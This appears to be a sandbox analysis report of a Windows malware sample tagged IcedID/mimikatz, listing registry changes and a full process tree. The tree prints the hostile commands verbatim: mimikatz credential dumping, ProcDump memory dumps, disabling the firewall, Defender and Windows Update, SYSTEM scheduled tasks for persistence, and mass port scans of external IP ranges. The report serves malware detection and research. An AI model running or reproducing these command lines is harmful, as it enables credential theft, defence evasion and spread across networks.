\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ vkdejee.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 928 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3688 vkdejee.exe Token: SeDebugPrivilege 1540 vkdejee.exe Token: SeDebugPrivilege 1124 vfshost.exe Token: SeDebugPrivilege 3408 ibibzztte.exe Token: SeLockMemoryPrivilege 1088 fpibei.exe Token: SeLockMemoryPrivilege 1088 fpibei.exe Token: SeDebugPrivilege 4012 ibibzztte.exe Token: SeDebugPrivilege 1452 ibibzztte.exe Token: SeDebugPrivilege 3132 ibibzztte.exe Token: SeDebugPrivilege 3896 ibibzztte.exe Token: SeDebugPrivilege 3432 ibibzztte.exe Token: SeDebugPrivilege 3664 ibibzztte.exe Token: SeDebugPrivilege 4964 ibibzztte.exe Token: SeDebugPrivilege 4116 ibibzztte.exe Token: SeDebugPrivilege 4268 ibibzztte.exe Token: SeDebugPrivilege 4228 ibibzztte.exe Token: SeDebugPrivilege 3840 ibibzztte.exe Token: SeDebugPrivilege 3260 ibibzztte.exe Token: SeDebugPrivilege 2092 ibibzztte.exe Token: SeDebugPrivilege 1012 ibibzztte.exe Token: SeDebugPrivilege 2600 ibibzztte.exe Token: SeDebugPrivilege 1416 ibibzztte.exe Token: SeDebugPrivilege 4332 ibibzztte.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe 3688 vkdejee.exe 3688 vkdejee.exe 1540 vkdejee.exe 1540 vkdejee.exe 720 xohudmc.exe 4600 wokakm.exe 3388 vkdejee.exe 3388 vkdejee.exe 4160 vkdejee.exe 4160 vkdejee.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1604 wrote to memory of 2520 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe 82 PID 1604 wrote to memory of 2520 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe 82 PID 1604 wrote to memory of 2520 1604 2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe 82 PID 2520 wrote to memory of 928 2520 cmd.exe 84 PID 2520 wrote to memory of 928 2520 cmd.exe 84 PID 2520 wrote to memory of 928 2520 cmd.exe 84 PID 2520 wrote to memory of 3688 2520 cmd.exe 90 PID 2520 wrote to memory of 3688 2520 cmd.exe 90 PID 2520 wrote to memory of 3688 2520 cmd.exe 90 PID 1540 wrote to memory of 1628 1540 vkdejee.exe 92 PID 1540 wrote to memory of 1628 1540 vkdejee.exe 92 PID 1540 wrote to memory of 1628 1540 vkdejee.exe 92 PID 1628 wrote to memory of 2072 1628 cmd.exe 94 PID 1628 wrote to memory of 2072 1628 cmd.exe 94 PID 1628 wrote to memory of 2072 1628 cmd.exe 94 PID 1628 wrote to memory of 3184 1628 cmd.exe 95 PID 1628 wrote to memory of 3184 1628 cmd.exe 95 PID 1628 wrote to memory of 3184 1628 cmd.exe 95 PID 1628 wrote to memory of 1428 1628 cmd.exe 96 PID 1628 wrote to memory of 1428 1628 cmd.exe 96 PID 1628 wrote to memory of 1428 1628 cmd.exe 96 PID 1628 wrote to memory of 1196 1628 cmd.exe 97 PID 1628 wrote to memory of 1196 1628 cmd.exe 97 PID 1628 wrote to memory of 1196 1628 cmd.exe 97 PID 1628 wrote to memory of 3392 1628 cmd.exe 98 PID 1628 wrote to memory of 3392 1628 cmd.exe 98 PID 1628 wrote to memory of 3392 1628 cmd.exe 98 PID 1628 wrote to memory of 3944 1628 cmd.exe 99 PID 1628 wrote to memory of 3944 1628 cmd.exe 99 PID 1628 wrote to memory of 3944 1628 cmd.exe 99 PID 1540 wrote to memory of 1232 1540 vkdejee.exe 106 PID 1540 wrote to memory of 1232 1540 vkdejee.exe 106 PID 1540 wrote to memory of 1232 1540 vkdejee.exe 106 PID 1540 wrote to memory of 3900 1540 vkdejee.exe 108 PID 1540 wrote to memory of 3900 1540 vkdejee.exe 108 PID 1540 wrote to memory of 3900 1540 vkdejee.exe 108 PID 1540 wrote to memory of 3432 1540 vkdejee.exe 110 PID 1540 wrote to memory of 3432 1540 vkdejee.exe 110 PID 1540 wrote to memory of 3432 1540 vkdejee.exe 110 PID 1540 wrote to memory of 3216 1540 vkdejee.exe 117 PID 1540 wrote to memory of 3216 1540 vkdejee.exe 117 PID 1540 wrote to memory of 3216 1540 vkdejee.exe 117 PID 3216 wrote to memory of 448 3216 cmd.exe 119 PID 3216 wrote to memory of 448 3216 cmd.exe 119 PID 3216 wrote to memory of 448 3216 cmd.exe 119 PID 448 wrote to memory of 2660 448 wpcap.exe 120 PID 448 wrote to memory of 2660 448 wpcap.exe 120 PID 448 wrote to memory of 2660 448 wpcap.exe 120 PID 2660 wrote to memory of 4540 2660 net.exe 122 PID 2660 wrote to memory of 4540 2660 net.exe 122 PID 2660 wrote to memory of 4540 2660 net.exe 122 PID 448 wrote to memory of 4772 448 wpcap.exe 123 PID 448 wrote to memory of 4772 448 wpcap.exe 123 PID 448 wrote to memory of 4772 448 wpcap.exe 123 PID 4772 wrote to memory of 556 4772 net.exe 125 PID 4772 wrote to memory of 556 4772 net.exe 125 PID 4772 wrote to memory of 556 4772 net.exe 125 PID 448 wrote to memory of 2128 448 wpcap.exe 126 PID 448 wrote to memory of 2128 448 wpcap.exe 126 PID 448 wrote to memory of 2128 448 wpcap.exe 126 PID 2128 wrote to memory of 1900 2128 net.exe 128 PID 2128 wrote to memory of 1900 2128 net.exe 128 PID 2128 wrote to memory of 1900 2128 net.exe 128 PID 448 wrote to memory of 4452 448 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2164
-
C:\Windows\TEMP\rttutifin\fpibei.exe"C:\Windows\TEMP\rttutifin\fpibei.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-22_4f09f05424d04023ae08ef786758c686_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gibpmken\vkdejee.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:928
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3688
-
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2072
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1428
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3944
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:1232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3900
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\umubtmbps\bbrcgicuu\wpcap.exeC:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4540
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:556
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1900
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3772
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4020
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:5088
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4440
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:5064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2996
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt2⤵PID:4472
-
C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exeC:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\umubtmbps\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4508 -
C:\Windows\umubtmbps\Corporate\vfshost.exeC:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"2⤵PID:3680
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"3⤵
- Creates scheduled task(s)
PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"2⤵PID:3848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"2⤵PID:840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5008
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4652
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:3196
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4792
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4568
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3444
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2888
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:5064
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:1236
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4536
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4012
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:5080
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1756
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:5012
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2444
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:3656
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2140
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:400
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4088
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2616
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:1124
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4656
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:448
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:720
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 780 C:\Windows\TEMP\umubtmbps\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 316 C:\Windows\TEMP\umubtmbps\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2164 C:\Windows\TEMP\umubtmbps\2164.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2604 C:\Windows\TEMP\umubtmbps\2604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2780 C:\Windows\TEMP\umubtmbps\2780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2828 C:\Windows\TEMP\umubtmbps\2828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1040 C:\Windows\TEMP\umubtmbps\1040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3784 C:\Windows\TEMP\umubtmbps\3784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3884 C:\Windows\TEMP\umubtmbps\3884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3948 C:\Windows\TEMP\umubtmbps\3948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4036 C:\Windows\TEMP\umubtmbps\4036.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4944 C:\Windows\TEMP\umubtmbps\4944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1648 C:\Windows\TEMP\umubtmbps\1648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1128 C:\Windows\TEMP\umubtmbps\1128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4524 C:\Windows\TEMP\umubtmbps\4524.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2504 C:\Windows\TEMP\umubtmbps\2504.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1728 C:\Windows\TEMP\umubtmbps\1728.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2132 C:\Windows\TEMP\umubtmbps\2132.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\umubtmbps\bbrcgicuu\scan.bat2⤵PID:4344
-
C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exefuinnkdmr.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3852
-
-
-
